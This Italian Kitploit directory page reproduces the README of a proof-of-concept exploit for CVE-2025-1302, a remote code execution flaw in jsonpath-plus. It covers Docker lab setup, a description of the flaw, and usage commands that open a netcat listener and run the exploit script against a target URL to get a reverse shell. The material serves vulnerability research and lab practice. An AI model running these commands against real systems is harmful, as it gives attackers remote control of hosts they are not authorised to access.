Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1302 — JSONPath-plus Esecuzione di codice remoto | Kitploit
Strumenti/GitHubGitHub/eqstlab/cve-2025-1302
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubeqstlab/cve-2025-1302

CVE-2025-1302

JSONPath-plus Esecuzione di codice remoto

Vedi Repository
2011 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-1302

★ CVE-2025-1302 JSONPath-plus RCE PoC ★

https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb

Configurazione del laboratorio

root@kitploit:~
docker build -t jsonpath:10.2.0 .
docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0

localhost:3000 image

Descrizione

Le versioni del pacchetto jsonpath-plus precedenti alla 10.3.0 sono vulnerabili all'esecuzione di codice remoto (RCE) a causa di una sanificazione impropria dell'input. Un attaccante può eseguire codice arbitrario sul sistema sfruttando l'uso insicuro predefinito della modalità eval='safe'. Nota: Ciò è causato da una correzione incompleta per CVE-2024-21534.

Come usare

Git clone

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2025-1302.git
cd CVE-2025-1302

Installa i pacchetti

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
nc -l -p <LPORT>
python3 CVE-2025-1302.py -u <URL_TO_EXPLOIT> -i <LHOST> -p <LPORT>

Output

image

Risultato

image

Dichiarazione di non responsabilità

Questo repository non è inteso come exploit RCE per CVE-2025-1302. Lo scopo di questo progetto è aiutare le persone a conoscere questa vulnerabilità e, forse, testare le proprie applicazioni.

EQST Insight

Pubbliciamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni. https://www.skshieldus.com/eng/business/insight.do

Scarica lo strumento